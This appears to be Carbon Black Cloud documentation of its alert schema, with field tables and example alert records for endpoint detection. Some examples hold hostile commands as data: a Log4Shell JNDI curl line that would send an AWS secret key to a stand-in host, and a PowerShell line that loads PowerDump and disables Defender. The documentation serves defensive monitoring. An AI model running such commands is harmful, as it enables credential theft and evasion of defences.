Alert Schema 2.0.0


Introduction

The following tables list the fields that can be included in an alert record for each alert type generated by the Carbon Black Cloud.

This Data Forwarder Schema (v2.0.0/) is aligned with the Alerts v7 API schema.

Fields in the Base Alert section are included with most alert types and the exceptions are annotated.

Alert types that are emitted from the Data Forwarder are dependent on the features you have enabled in Carbon Black Cloud. Possible Alert types are:

Data Types

Find more detail on the data types here.

Base Alert

These fields are included with all alert types.

Field Name Definition Datatype
additional_events_present Indicator to let API and forwarder users know that they should look up other associated events related to this alert
Not available on Container Runtime Alerts
Not available on Device Control Alerts
Boolean
alert_notes_present True if notes are present on the alert ID. False if notes are not present. Boolean
alert_url Link to the alerts page for this alert. Does not vary by alert type String
backend_timestamp Timestamp when the Carbon Black Cloud processed and enabled the alert for searching. Corresponds to the Created column on the Alerts page. ISO 8601 UTC Date String
backend_update_timestamp. Timestamp when the Carbon Black Cloud initiated and processed an update to an alert. Corresponds to the Updated column on the Alerts page.
Note that changes made by users do not change this date; those changes are reflected on user_update_timestamp		 ISO 8601 UTC Date String
blocked_effective_reputation Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
blocked_md5 MD5 hash of the child process binary; for any process terminated by the sensor
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
blocked_name Tokenized file path of the files blocked by sensor action
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
blocked_sha256 SHA-256 hash of the child process binary; for any process terminated by the sensor
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
childproc_cmdline Command line for the child process
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
childproc_effective_reputation Effective reputation of the child process; applied by the sensor at the time the event occurred
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
childproc_guid Unique process identifier assigned to the child process
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
childproc_md5 Hash of the child process' binary (Enterprise EDR)
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
childproc_name Filesystem path of the child process' binary
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
childproc_sha256 Hash of the child process' binary (Endpoint Standard)
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
childproc_username User context in which the child process was executed
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
detection_timestamp Timestamp when the alert was first detected. For sensor-sent alerts, this is the time of the event on the sensor. For alerts generated on the backend, this is the time the backend system triggered the alert. ISO 8601 UTC Date String
determination User-updatable determination of the alert Nested Response Object: 
{
  "determination": {
    "change_timestamp": "<string>",
    "changed_by": "<string>",
    "changed_by_type": "<string>",
    "value": "<string>"
  }
}
determination_change_timestamp When the determination was updated. ISO 8601 UTC Date String
determination_changed_by User the determination was changed by. String
determination_changed_by_type String
SYSTEM
USER
API
AUTO_CLOSE
determination_value Determination of the alert set by a user String
NONE
TRUE_POSITIVE
FALSE_POSITIVE
device_external_ip IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to network proxy or NAT; either IPv4 (dotted decimal notation) or IPv6 (proprietary format)
Not available on Container Runtime Alerts
String
device_id ID of devices
Not available on Container Runtime Alerts
Integer
device_internal_ip IP address of the endpoint reported by the sensor; either IPv4 (dotted decimal notation) or IPv6 (proprietary format)
Not available on Container Runtime Alerts
String
device_location Whether the device was on or off premises when the alert started, based on the current IP address and the device’s registered DNS domain suffix
Not available on Container Runtime Alerts
String
ONSITE
OFFSITE
UNKNOWN
device_name Device name
Not available on Container Runtime Alerts
String
device_os Device Operating Systems
Not available on Container Runtime Alerts
String
WINDOWS
MAC
LINUX
OTHER
device_os_version The operating system and version of the endpoint. Requires Windows CBC sensor version 3.5 or later.
Not available on Container Runtime Alerts
String
device_policy Device policy
Not available on Container Runtime Alerts
String
device_policy_id Device policy id
Not available on Container Runtime Alerts
Integer
device_target_value Target value assigned to the device, set from the policy
Not available on Container Runtime Alerts
String
LOW
MEDIUM
HIGH
MISSION_CRITICAL
device_uem_id Device correlation with WS1/EUC, required for our Workspace ONE Intelligence integration to function
Not available on Container Runtime Alerts
String
device_username Users or device owners of alerts
Not available on Container Runtime Alerts
String
first_event_timestamp Timestamp when the first event in the alert occurred ISO 8601 UTC Date String
id Unique ID of alert String
is_updated Set to true if this is an updated copy of the alert initiated by the Carbon Black Cloud backend. User workflow updates, such as adding a note, will generate a new copy of the alert, but is_updated will be set to false. Boolean
last_event_timestamp Timestamp when the last event in the alert occurred ISO 8601 UTC Date String
netconn_local_ip IP address of the remote side of the network connection; stored as dotted decimal Not available on Device Control Alerts
String
netconn_local_ipv4 IPv4 address of the local side of the network connection; stored as a dotted decimal. Only one of ipv4 and ipv6 fields will be populated. Not available on Device Control Alerts
String
netconn_local_ipv6 IPv6 address of the local side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated. Not available on Device Control Alerts
String
netconn_local_port TCP or UDP port used by the local side of the network connection Not available on Device Control Alerts
Integer
netconn_protocol Network protocol of the network connection Not available on Device Control Alerts
String
netconn_remote_domain Domain name (FQDN) associated with the remote end of the network connection, if available Not available on Device Control Alerts
String
netconn_remote_ip IP address of the local side of the network connection; stored as dotted decimal Not available on Device Control Alerts
String
netconn_remote_ipv4 IPv4 address of the remote side of the network connection; stored as dotted decimal. Only one of ipv4 and ipv6 fields will be populated. Not available on Device Control Alerts
String
netconn_remote_ipv6 IPv6 address of the remote side of the network connection; stored as a string without octet-separating colon characters. Only one of ipv4 and ipv6 fields will be populated. Not available on Device Control Alerts
String
netconn_remote_port TCP or UDP port used by the remote side of the network connection; same as netconn_port and event_network_remote_port Not available on Device Control Alerts
Integer
org_key Unique alphanumeric string that identifies your organization in the Carbon Black Cloud String
parent_cmdline Command line of the parent process
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
parent_effective_reputation Effective reputation of the parent process; applied by the sensor when the event occurred
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
parent_guid Unique process identifier assigned to the parent process
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
parent_md5 MD5 hash of the parent process binary
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
parent_name Filesystem path of the parent process binary
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
parent_pid Identifier assigned by the operating system to the parent process Integer
parent_reputation Reputation of the parent process; applied by the Carbon Black Cloud when the event is initially processed
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
parent_sha256 SHA-256 hash of the parent process binary
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
parent_username User context in which the parent process was executed
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
policy_applied Indicates whether or not a policy has been applied to any event associated with this alert String
APPLIED
NOT_APPLIED
primary_event_id ID of the primary event in the alert String
process_cmdline Command line executed by the actor process
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
process_effective_reputation Effective reputation of the actor hash
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
process_guid Guid of the process that has fired the alert (optional)
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
process_issuer The certificate authority associated with the process’s certificate
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
process_md5 MD5 hash of the actor process binary
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
process_name Process names of an alert
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
process_pid PID of the process that has fired the alert (optional) Integer
process_publisher Publisher name on the certificate used to sign the Windows or macOS process binary
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
process_reputation Reputation of the actor process; applied when event is processed by the Carbon Black Cloud
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
ADAPTIVE_WHITE_LIST
COMMON_WHITE_LIST
COMPANY_BLACK_LIST
COMPANY_WHITE_LIST
PUP
TRUSTED_WHITE_LIST
RESOLVING
COMPROMISED_OBSOLETE
DLP_OBSOLETE
IGNORE
ADWARE
HEURISTIC
SUSPECT_MALWARE
KNOWN_MALWARE
ADMIN_RESTRICT_OBSOLETE
NOT_LISTED
GRAY_OBSOLETE
NOT_COMPANY_WHITE_OBSOLETE
LOCAL_WHITE
NOT_SUPPORTED
process_sha256 SHA-256 hash of the actor process binary
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
process_username User context in which the actor process was executed. MacOS - all users for the PID for fork() and exec() transitions. Linux - process user for exec() events, but in a future sensor release can be multi-valued due to setuid().
Not available on Container Runtime Alerts
Not available on Device Control Alerts
String
reason A spoken language written explanation of the what and why the alert occurred and any action taken, usually consisting of 1 to 3 sentences. String
reason_code A unique short-hand code or GUID identifying the particular alert reason String
run_state Whether the threat in the alert actually ran String
DID_NOT_RUN
RAN
UNKNOWN
sensor_action Actions taken by the sensor, according to the rules of a policy String
ALLOW
DENY
TERMINATE
severity integer representation of the impact of alert if true positive Integer
threat_id ID assigned to a group of alerts with common criteria, based on alert type String
type Type of alert generated String
CB_ANALYTICS
WATCHLIST
DEVICE_CONTROL
CONTAINER_RUNTIME
HOST_BASED_FIREWALL
INTRUSION_DETECTION_SYSTEM
NETWORK_TRAFFIC_ANALYSIS
user_update_timestamp Timestamp of the last property of an alert changed by a user, such as the alert workflow or determination ISO 8601 UTC Date String
version The version of the schema being emitted. e.g. 2.0.0 String
workflow Current workflow state of an alert. The workflow represents the flow from OPEN to IN_PROGRESS to CLOSED and captures who moved the alert into the current state. The history of these state transitions is available via the alert history route. Nested Response Object: 
{
"workflow": {
  "change_timestamp": "<string>",
  "changed_by": "<string>",
  "changed_by_type": "<string>",
  "changed_by_autoclose_rule_id": "<string>",
  "closure_reason": "<string>",
  "status": "<string>"
}
}
workflow_change_timestamp When the last status change occurred ISO 8601 UTC Date String
workflow_changed_by Who (or what) made the last status change String
workflow_changed_by_type String
SYSTEM
USER
API
AUTO_CLOSE
workflow_closure_reason A more detailed description of why the alert was resolved String
NO_REASON
RESOLVED
RESOLVED_BENIGN_KNOWN_GOOD
DUPLICATE_CLEANUP
OTHER
workflow_status primary value used to determine if the alert is active or inactive and displayed in the UI by default String
OPEN
IN_PROGRESS
CLOSED

Example

    {
      "version":"2.0.0",
      "org_key":"ABCD1234",
      "alert_url":"https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Aca316d99-a808-3779-8aab-62b2b6d9541c",
      "id":"ca316d99-a808-3779-8aab-62b2b6d9541c",
      "type":"INTRUSION_DETECTION_SYSTEM",
      "is_updated":false,
      "detection_timestamp":"2023-02-03T17:22:03.945Z",
      "first_event_timestamp":"2023-02-03T17:22:03.945Z",
      "last_event_timestamp":"2023-02-03T17:22:03.945Z",
      "severity":1,
      "reason":"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit. curl.exe made a HTTP/80 connection to 142.250.189.174 from 10.203.105.21",
      "threat_id":"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017",
      "primary_event_id":"21AB6B27-9F72-11ED-A79A-005056A53F17",
      "workflow":{
        "status":"OPEN",
        "change_timestamp":"2023-02-03T17:27:33.007Z",
        "changed_by_type":"SYSTEM",
        "changed_by":"ALERT_CREATION",
        "closure_reason":"NO_REASON"
        },
      "alert_notes_present":false,
      "policy_applied":"NOT_APPLIED",
      "run_state":"RAN",
      "rule_category_id":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D",
      "rule_id":"B5974D4D-265E-4FAF-8F71-2F76AAD67857",
      "reason_code":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857",
      "sensor_action":"ALLOW",
      "device_target_value":"MEDIUM",
      "device_policy_id":165700,
      "device_policy":"Standard",
      "device_id":17482451,
      "device_name":"DEV01-39X-1",
      "device_os":"WINDOWS",
      "device_os_version":"Windows 10 x64",
      "device_username":"DemoMachine",
      "device_location":"UNKNOWN",
      "device_external_ip":"66.170.99.2",
      "device_internal_ip":"10.203.105.21",
      "netconn_remote_port":80,
      "netconn_local_port":49233,
      "netconn_remote_domain":"google.com",
      "netconn_remote_ip":"142.250.189.174",
      "netconn_local_ip":"10.203.105.21",
      "netconn_remote_ipv4":"142.250.189.174",
      "netconn_local_ipv4":"10.203.105.21",
      "attack_tactic":"TA0001",
      "attack_technique":"T1190",
      "tms_rule_id":"4b98443a-ba0d-4ff5-b99e-e5e70432a214",
      "threat_name":"CVE-2021-44228 Exploit",
      "process_guid":"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0",
      "process_pid":5780,
      "process_name":"c:\\windows\\system32\\curl.exe",
      "process_sha256":"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4",
      "process_md5":"eac53ddafb5cc9e780a7cc086ce7b2b1",
      "process_reputation":"TRUSTED_WHITE_LIST",
      "process_effective_reputation":"TRUSTED_WHITE_LIST",
      "process_cmdline":"curl  -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids",
      "process_username":"DEV01-39X-1\\bit9qa",
      "process_issuer":["Microsoft Windows Production PCA 2011"],
      "process_publisher":["Microsoft Windows"],
      "parent_guid":"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a",
      "parent_pid":8796,
      "parent_name":"c:\\windows\\system32\\cmd.exe",
      "parent_sha256":"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
      "parent_md5":"8a2122e8162dbef04694b9c3e0b6cdee",
      "parent_reputation":"TRUSTED_WHITE_LIST",
      "parent_effective_reputation":"TRUSTED_WHITE_LIST",
      "parent_cmdline":"\"C:\\WINDOWS\\system32\\cmd.exe\" ",
      "parent_username":"DEV01-39X-1\\bit9qa",
      "mdr_alert_notes_present":false,
      "mdr_alert":false
    }


CB Analytics Alerts

CB Analytics alerts are created from the Endpoint Standard NGAV offering. They contain the fields in this section in addition to those listed in Base Alert.

Field Name Definition Datatype
attack_tactic A tactic from the MITRE ATT&CK framework; defines a reason for an adversary’s action, such as achieving credential access String
attack_technique A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access String
rule_category_id ID representing the category of the rule_id for certain alert types String
rule_id ID of the rule that triggered an alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence, and USB Device Control alerts String
threat_category Categories of threats which we were able to take action on String
UNKNOWN
NON_MALWARE
NEW_MALWARE
KNOWN_MALWARE
RISKY_PROGRAM
UNRECOGNIZED
ttps Other potential malicious activities involved in a threat String

Example

    {
        "version":"2.0.0",
        "org_key":"ABCD1234",
        "alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
        "id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
        "type":"CB_ANALYTICS",
        "is_updated":true,
        "detection_timestamp":"2023-07-17T17:15:51.708Z",
        "backend_timestamp":"2023-07-17T17:16:50.960Z",
        "backend_update_timestamp":"2023-07-17T17:18:03.397Z",
        "first_event_timestamp":"2023-07-17T17:15:33.396Z",
        "last_event_timestamp":"2023-07-17T17:15:33.396Z",
        "severity":5,
        "reason":"A known virus (HackTool: Powerpuff) was detected running.",
        "threat_id":"9e0afc389c1acc43b382b1ba590498d2",
        "primary_event_id":"94953e4524c511ee86284f0541a5184d",
        "workflow":{
            "status":"OPEN",
            "change_timestamp":"2023-07-17T17:16:50.960Z",
            "changed_by_type":"SYSTEM",
            "changed_by":"ALERT_CREATION",
            "closure_reason":"NO_REASON"
        },
        "determination":{
            "value":"NONE",
            "change_timestamp":"2023-07-17T17:16:50.960Z"
        },
        "alert_notes_present":false,
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "reason_code":"T_REP_VIRUS",
        "sensor_action":"ALLOW",
        "device_target_value":"MISSION_CRITICAL",
        "device_policy_id":112221,
        "device_policy":"SSQ_Policy",
        "device_id":6948863,
        "device_name":"Kognos-W19-CB-3",
        "device_os":"WINDOWS",
        "device_os_version":"Windows Server 2019 x64",
        "device_username":"demouser@demo.org",
        "device_location":"OFFSITE",
        "device_external_ip":"34.234.170.45",
        "device_internal_ip":"10.0.14.120",
        "ttps":[
            "FILELESS",
            "MALWARE_APP",
            "MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER",
            "MITRE_T1059_001_POWERSHELL",
            "RUN_MALWARE_APP"
        ],
        "attack_tactic":"TA0002",
        "process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73",
        "process_pid":3600,
        "process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1",
        "process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0",
        "process_md5":"42a80cc2333b612b63a859f17474c9af",
        "process_reputation":"KNOWN_MALWARE",
        "process_effective_reputation":"KNOWN_MALWARE",
        "process_cmdline":"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}",
        "process_username":"KOGNOS-W19-CB-3\\Administrator",
        "parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed",
        "parent_pid":4024,
        "parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
        "parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
        "parent_reputation":"TRUSTED_WHITE_LIST",
        "parent_effective_reputation":"TRUSTED_WHITE_LIST",
        "parent_username":"KOGNOS-W19-CB-3\\Administrator",
        "childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000",
        "childproc_effective_reputation":"RESOLVING",
        "childproc_username":"KOGNOS-W19-CB-3\\Administrator",
        "blocked_effective_reputation":"RESOLVING",
        "mdr_alert_notes_present":false,
        "mdr_alert":false
    }


Container Runtime Alerts

Container Runtime alerts are created from the Container Security offering. They contain the fields in this section in addition to those listed in Base Alert section.

Field Name Definition Datatype
connection_type Connection Type String
INTERNAL_INBOUND
INTERNAL_OUTBOUND
INGRESS
EGRESS
egress_group_id Unique identifier for the egress group String
egress_group_name Name of the egress group String
ip_reputation Range of reputations to accept for the remote IP:
0: unknown
1-20: high risk
21-40: suspicious
41-60: moderate
61-80: low risk
81-100: trustworthy

There must be two values in this list. The first is the lower end of the range (inclusive) the second is the upper end of the range (inclusive)		 Integer
k8s_cluster K8s Cluster name String
k8s_kind K8s Workload kind String
k8s_namespace K8s namespace String
k8s_pod_name Name of the pod within a workload String
k8s_policy Name of the K8s policy String
k8s_policy_id Unique identifier for the K8s policy String
k8s_rule Name of the K8s policy rule String
k8s_rule_id Unique identifier for the K8s policy rule String
k8s_workload_name K8s Workload Name String
remote_is_private Is the remote information private: true or false Boolean
remote_k8s_kind Kind of remote workload; set if the remote side is another workload in the same cluster String
remote_k8s_namespace Namespace within the remote workload’s cluster; set if the remote side is another workload in the same cluster String
remote_k8s_pod_name Remote workload pod name; set if the remote side is another workload in the same cluster String
remote_k8s_workload_name Name of the remote workload; set if the remote side is another workload in the same cluster String

Example

    {
        "version":"2.0.0",
        "org_key":"ABCD1234",
        "alert_url":"https://defense-dev01.cbdtest.io/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3Af0c7970b-f23c-919e-0cd8-7a38bd373a6f",
        "id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f",
        "type":"CONTAINER_RUNTIME",
        "is_updated":false,
        "detection_timestamp":"2023-02-06T00:10:51.176Z",
        "first_event_timestamp":"2023-02-06T00:09:19.320Z",
        "last_event_timestamp":"2023-02-06T00:09:19.320Z",
        "severity":5,
        "reason":"Detected a connection to a public destination that isn't allowed for this scope",
        "threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c",
        "primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61",
        "workflow":{
            "status":"OPEN",
            "change_timestamp":"2023-02-06T00:13:37.663Z",
            "changed_by_type":"SYSTEM",
            "changed_by":"ALERT_CREATION",
            "closure_reason":"NO_REASON"
        },
        "alert_notes_present":false,
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
        "sensor_action":"ALLOW",
        "device_target_value":"MEDIUM",
        "device_os":"WINDOWS",
        "device_location":"UNKNOWN",
        "k8s_policy_id":"ef4ccd0b-df14-4f5d-8454-480c5193a0b7",
        "k8s_policy":"Big runtime policy",
        "k8s_rule_id":"11111111-1111-1111-1111-111111111111",
        "k8s_rule":"Allowed public destinations",
        "k8s_cluster":"tomer:sensor-aks",
        "k8s_namespace":"kube-system",
        "k8s_kind":"DaemonSet",
        "k8s_workload_name":"ama-logs",
        "k8s_pod_name":"ama-logs-gm5tt",
        "connection_type":"EGRESS",
        "ip_reputation":96,
        "netconn_remote_port":443,
        "netconn_local_port":56618,
        "netconn_protocol":"TCP",
        "netconn_remote_domain":"westeurope.monitoring.azure.com",
        "netconn_remote_ip":"20.50.65.82",
        "netconn_local_ip":"10.244.2.22",
        "netconn_remote_ipv4":"20.50.65.82",
        "netconn_local_ipv4":"10.244.2.22",
        "remote_is_private":false,
        "process_guid":"ABCD1234-00000000-00200e62-00000000-1d92c1262642b33",
        "process_pid":2100834,
        "process_name":"KUBERNETES_RUNTIME_NODE_AGENT",
        "process_sha256":"506ffc437f5d3c4803a45b895b02557e7280eb3c6eb7d8ff8bd9073990e989d5",
        "process_md5":"4cbdc5f51d0397b26886191b799131d5",
        "process_reputation":"NOT_LISTED",
        "process_effective_reputation":"RESOLVING",
        "mdr_alert_notes_present":false,
        "mdr_alert":false
    }


Device Control Alerts

Device Control alerts are created when an endpoint attempts to access a blocked USB device. They contain the fields in this section in addition to those listed in Base Alert section.

Field Name Definition Datatype
external_device_friendly_name Human-readable external device names String
product_id IDs of the product that identifies USB devices String
product_name Names of the product that identifies USB devices String
serial_number Serial numbers of the specific devices String
vendor_id IDs of the vendors who produced the devices String
vendor_name Names of the vendors who produced the devices String


Host Based Firewall Alerts

Host-Based Firewall alerts are created from network detections in the Endpoint Standard Host-Based Firewall add-on. They contain the fields in this section in addition to those listed in Base Alert section.

Field Name Definition Datatype
rule_category_id ID representing the category of the rule_id for certain alert types String
rule_id ID of the rule that triggered an alert; applies to Intrusion Detection System, Host-Based Firewall, TAU Intelligence, and USB Device Control alerts String


Intrusion Detection Alerts

Intrusion Detection System alerts are created by the XDR extension to Enterprise EDR. They contain the fields in this section in addition to those listed in Base Alert section.

Field Name Definition Datatype
attack_tactic A tactic from the MITRE ATT&CK framework; defines a reason for an adversary’s action, such as achieving credential access String
attack_technique A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access String
rule_category_id ID representing the category of the rule_id for certain alert types String
threat_category Categories of threats which we were able to take action on String
UNKNOWN
NON_MALWARE
NEW_MALWARE
KNOWN_MALWARE
RISKY_PROGRAM
UNRECOGNIZED
threat_name Name of the threat String
tms_rule_id Detection id String
ttps Other potential malicious activities involved in a threat String


Watchlist Alerts

Watchlist alerts are created from alert enabled watchlists in Enterprise EDR. They contain the fields in this section in addition to those listed in Base Alert section.

Field Name Definition Datatype
attack_tactic A tactic from the MITRE ATT&CK framework; defines a reason for an adversary’s action, such as achieving credential access String
attack_technique A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access String
ioc_field The field the indicator of comprise (IOC) hit contains String
ioc_hit IOC field value or IOC query that matches String
ioc_id Unique identifier of the IOC that generated the watchlist hit String
ml_classification_final_verdict Final verdict of the alert, based on the ML models that were used to make the prediction. String
NOT_CLASSIFIED
NOT_ANOMALOUS
ANOMALOUS
ml_classification_global_prevalence Categories (low/medium/high) used to describe the prevalence of alerts across all regional organizations. String
UNKNOWN
LOW
MEDIUM
HIGH
ml_classification_org_prevalence Categories (low/medium/high) used to describe the prevalence of alerts within an organization. String
UNKNOWN
LOW
MEDIUM
HIGH
report_description Description of the watchlist report associated with the alert String
report_id Report IDs that contained the IOC that caused a hit String
report_link Link of reports that contained the IOC that caused a hit String
report_name Name of the watchlist report String
report_tags Tags associated with the watchlist report String[]
ttps Other potential malicious activities involved in a threat String
watchlists List of watchlists associated with an alert. Alerts are batched hourly Nested Response Object: 
{
"watchlists": {
  "id": "",
  "name": ""
}
}
watchlists_id String
watchlists_name String

Example

    {
        "version":"2.0.0",
        "org_key":"ABCD1234",
        "alert_url":"https://defense.conferdeploy.net/alerts?orgKey=ABCD1234&s%5Bc%5D%5Bquery_string%5D=id%3A3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
        "id":"3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
        "type":"WATCHLIST",
        "is_updated":false,
        "detection_timestamp":"2023-07-17T17:21:13.483Z",
        "backend_timestamp":"2023-07-17T17:21:34.063Z",
        "backend_update_timestamp":"2023-07-17T17:21:34.063Z",
        "first_event_timestamp":"2023-07-17T17:19:00.412Z",
        "last_event_timestamp":"2023-07-17T17:19:00.412Z",
        "severity":10,
        "reason":"Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"",
        "threat_id":"CF4E6DE74AA8B188C0346A54FDEA940C",
        "primary_event_id":"VUX7Bu7vTrWwnU8-uSVh1A-0",
        "workflow":{
            "status":"OPEN",
            "change_timestamp":"2023-07-17T17:21:34.063Z",
            "changed_by_type":"SYSTEM",
            "changed_by":"ALERT_CREATION",
            "closure_reason":"NO_REASON"
        },
        "determination":{
            "value":"NONE",
            "change_timestamp":"2023-07-17T17:21:34.063Z"
        },
        "alert_notes_present":false,
        "policy_applied":"NOT_APPLIED",
        "run_state":"RAN",
        "reason_code":"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab",
        "sensor_action":"ALLOW",
        "device_target_value":"MEDIUM",
        "device_policy_id":6525,
        "device_policy":"default",
        "device_id":5890528,
        "device_name":"ABT102675",
        "device_uem_id":"596B6C4DD49AEF4AB3713363DDBB1F11",
        "device_os":"WINDOWS",
        "device_os_version":"Windows 11 x64",
        "device_username":"DemoMachine",
        "device_location":"UNKNOWN",
        "device_external_ip":"49.206.61.4",
        "device_internal_ip":"192.168.0.104",
        "report_id":"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018",
        "report_name":"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior",
        "report_description":"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.",
        "report_tags":[
            "credentialaccess",
            "t1558",
            "windows",
